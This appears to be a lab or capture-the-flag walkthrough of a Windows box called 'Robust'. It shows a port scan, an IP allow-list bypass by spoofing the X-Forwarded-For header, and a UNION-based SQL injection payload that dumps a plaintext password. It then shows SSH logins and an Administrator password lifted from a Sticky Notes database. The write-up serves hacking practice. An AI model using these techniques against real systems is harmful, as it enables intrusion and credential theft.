$ sudo nmap -sCV -p- -v -Pn --open 192.168.213.200 > Robust.txt
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 21:76:63:1c:3b:10:a6:a7:73:d6:e7:dd:1e:a2:b6:83 (RSA)
|   256 62:a8:39:f6:ab:92:cd:26:03:bf:1e:28:25:4e:8e:7a (ECDSA)
|_  256 02:39:7c:e2:af:6a:44:98:ec:9a:28:98:a0:8b:fe:c4 (ED25519)
80/tcp   open  http       PHP cli server 5.5 or later (PHP 7.3.33)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 3886E4F91779D83BCEA468A489EAC95F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was login.php
7680/tcp open  pando-pub?

http://192.168.213.200/ 
Your IP is not allowed to use this webservice. Only 10.10.10.x is allowed

Burpsuite added:
X-Forwarded-For: 10.10.10.1

Then burpsuite-->Proxy-->Match and replace-->
Add Request header --> Match [blank] --> Replace X-Forwarded-For: 10.10.10.1 # this is for browser to visit http://192.168.213.200/ when burpsuite extension on
Add Response header --> Match Location --> Replace [blank] # this is for visit home.php (gobust -H 'X-Forwarded-For: 10.10.10.1' to find home.php) without redirect to login.php

In home.php find a database.
Last name: ' UNION select * from employees' search 
	Jeff	Hills	Mathsisfun123
	

Jeff:Mathsisfun123
ssh in with this cred.

$ ssh jeff@192.168.213.200
The authenticity of host '192.168.213.200 (192.168.213.200)' can't be established.
ED25519 key fingerprint is: SHA256:yU8TIdaHGC7RlixgxXYPcoG6AIQsh59/ABR21NrTkls
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.213.200' (ED25519) to the list of known hosts.
jeff@192.168.213.200's password: 
Microsoft Windows [Version 10.0.19042.1586]
(c) Microsoft Corporation. All rights reserved.
                                               
jeff@ROBUST C:\Users\Jeff>whoami /all          

USER INFORMATION
----------------

User Name   SID
=========== ==============================================
robust\jeff S-1-5-21-2619112490-2635448554-1147358759-1002

jeff@ROBUST C:\Users\Jeff>dir /s /b *.sqlite
C:\Users\Jeff\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
\plum.sqlite
C:\Users\Jeff\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\Media
Db.v1.sqlite

jeff@ROBUST C:\>type C:\Users\Jeff\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8we
kyb3d8bbwe\LocalState\plum.sqlite

Administrator:MySupersecurePassword2112

$ ssh administrator@192.168.213.200
administrator@192.168.213.200's password: 
Microsoft Windows [Version 10.0.19042.1586]
(c) Microsoft Corporation. All rights reserved.
                                               
administrator@ROBUST C:\Users\Administrator>

refer:https://zenn.dev/iestudy/articles/0e5eba2bdd361e


